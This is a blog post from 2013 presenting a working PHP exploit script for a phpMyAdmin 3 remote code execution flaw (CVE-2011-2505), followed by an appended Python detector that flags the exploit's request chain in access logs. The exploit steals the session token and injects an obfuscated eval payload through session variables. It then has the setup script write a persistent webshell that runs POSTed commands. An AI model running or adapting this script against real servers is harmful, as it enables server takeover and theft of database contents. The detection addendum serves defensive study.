phpadmin3 remote code execute PHP version exploit

Posted on 2013-2-21 09:13:03
I've been a full-time stay-at-home dad lately, out of touch with the scene for many months, and the blog hasn't been updated either.

Last night I was up all night with the kid and saw heige's discussion of the phpMyAdmin3 vulnerability in the php security group. I hadn't looked at the vulnerable code before, though I had seen wofeiwo's exp on Weibo a while ago. According to heige there is a way to exploit it that is not jilei (chicken ribs, i.e. of marginal use), so during the night I dug out the code, studied it, and wrote this reheated exp. Since I got to it late and many people had already studied it and written exps, mine is just reheating leftovers, purely as research to pass the time.

First, kudos to wofeiwo's Python version of the exp, and kudos to wofeiwo's and superhei's dedication to research; role models to learn from. That earlier exp, however, has some limitations in use:
First, session.auto_start = 1;
Second, in pma3's default code the libraries directory is already denied access via .htaccess.
And of course the third point, the gap nobody can cross: the config directory must exist and be writable.

After reading heige's remarks in the group and looking at the code again, I found the first two limitations can both be ignored. So this vulnerability really can be not so jilei after all.

So I wrote this PHP version of the exp; the code follows:
3 c8 x% L2 {- ]( ]  I
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');

/**
 * working when the directory:"config" exists and is writeable.
 **/

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
    exit;
}

$host = $argv[1];
$path = $argv[2];

/**
 * Try to determine if the directory:"config" exists
 **/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr=php_request('config/');
if(strpos($returnstr,'404')){
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
}

/**
 * Try to get token and sessionid
 **/
echo "[+] Try to get token and sessionid....\n";
$result=php_request('index.php');
// the session cookie and the CSRF token are both present in the index.php response
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=$resp[3];
$sessionid=$resp[1];
if($token && $sessionid){
    echo "[+] token: $token\n";
    echo "[+] Session ID: $sessionid\n";
}else{
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}

/**
 * Try to insert shell into session
 **/
echo "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.

/**
 * Try to create webshell
 **/
echo "[+] Try to create webshell....\n";
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);

/**
 * Try to check if the webshell was created successfully
 **/
echo "[+] Try to check if the webshell was created successfully....\n";
$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')){
    echo "[+] Congratulations! Exploit successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
}else{
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}

// minimal HTTP/1.1 client over a plain socket on port 80: GET when $data is empty, POST otherwise
function php_request($url,$data='',$cookie=''){
    global  $host, $path;

    $method=$data?'POST':'GET';

    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
    $packet .= $cookie?"Cookie: $cookie\r\n":"";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data?$data:"";

    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
        echo 'No response from '.$host; die;
    }
    fputs($fp, $packet);

    $resp = '';

    // read the whole response (headers and body) until the server closes the connection
    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>
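As an added defensive example (not part of the original post or of phpMyAdmin), the request sequence the exploit above issues is a usable detection signature: a probe of config/, a query string that writes arbitrary `_SESSION[...]` keys next to `session_to_unset`, a POST to setup/config.php, then a fetch of config/config.inc.php. The script below parses constructed Apache-style access-log lines and reports source IPs that complete the chain; the log lines, IPs and indicator names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-log lines (sample data, not from a real server)
# that mirror the request sequence the exploit above issues.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Feb/2013:09:13:01 +0800] "GET /pma/config/ HTTP/1.1" 200 312 "-" "Mozilla/4.0 (compatible; MSIE 6.00)"
203.0.113.5 - - [21/Feb/2013:09:13:02 +0800] "GET /pma/index.php HTTP/1.1" 200 8812 "-" "Mozilla/4.0 (compatible; MSIE 6.00)"
203.0.113.5 - - [21/Feb/2013:09:13:03 +0800] "GET /pma/db_create.php?token=abc&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][x][host]=y HTTP/1.1" 200 521 "-" "Mozilla/4.0 (compatible; MSIE 6.00)"
203.0.113.5 - - [21/Feb/2013:09:13:04 +0800] "POST /pma/setup/config.php HTTP/1.1" 200 1440 "-" "Mozilla/4.0 (compatible; MSIE 6.00)"
203.0.113.5 - - [21/Feb/2013:09:13:05 +0800] "GET /pma/config/config.inc.php HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.00)"
198.51.100.7 - - [21/Feb/2013:09:20:00 +0800] "GET /pma/index.php?db=test HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify(line):
    """Return the indicator names fired by one access-log line."""
    m = LINE_RE.match(line)
    if not m:
        return []
    parts = urlsplit(unquote(m.group('target')))
    path = parts.path.lower()
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    ok = m.group('status') == '200'
    hits = []
    # exploit step 1: probing whether the setup script's config/ directory still exists
    if path.endswith('/config/') and ok:
        hits.append('config-dir-present')
    # step 3: arbitrary $_SESSION keys set through the query string (the session_to_unset bug)
    if 'session_to_unset' in params or any(k.startswith('_SESSION[') for k in params):
        hits.append('session-injection')
    # step 4: the setup script writing the poisoned session out as config.inc.php
    if m.group('method') == 'POST' and path.endswith('/setup/config.php'):
        hits.append('setup-config-save')
    # step 5: the generated config being fetched to confirm the write succeeded
    if path.endswith('/config/config.inc.php') and ok:
        hits.append('config-file-fetched')
    return hits

def find_exploit_chains(log_text):
    """Map source IP -> indicators, keeping only IPs that both injected session
    keys and triggered the setup save (the full chain, not a lone probe)."""
    per_ip = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            per_ip.setdefault(m.group('ip'), []).extend(classify(line))
    return {ip: h for ip, h in per_ip.items()
            if 'session-injection' in h and 'setup-config-save' in h}
```

A lone `config-dir-present` hit is also worth acting on: the setup script's config directory is only needed during installation and should be removed afterwards.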